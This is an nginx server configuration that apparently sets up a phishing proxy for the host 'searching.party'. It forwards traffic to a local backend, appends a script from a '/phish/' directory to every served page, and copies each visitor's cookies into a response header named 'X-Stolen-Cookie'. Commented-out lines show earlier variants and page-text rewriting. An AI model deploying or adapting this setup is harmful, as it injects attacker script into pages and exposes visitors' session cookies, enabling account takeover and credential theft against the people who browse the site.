server {
    listen 80;
    server_name searching.party 107.170.50.16;
 
    allow all;

    root   /usr/share/nginx/html;
    index  index.html index.htm;
 
    location / {
        #add_after_body /phish/include.js;
        proxy_pass  http://localhost:8080;
        proxy_next_upstream error timeout invalid_header http_500 http_502 http_503 http_504;
        proxy_redirect off;
        proxy_buffering off;
        proxy_set_header         Host            searching.party;
        #proxy_set_header        X-Real-IP       $remote_addr;
        #proxy_set_header        X-Forwarded-For $proxy_add_x_forwarded_for;
	add_after_body /phish/script.js;
#	sub_filter 	"Super User" "Dickbutt";
#	sub_filter_once off;
#	sub_filter_types *;
	add_header		X-Stolen-Cookie	$http_cookie;

    }

}
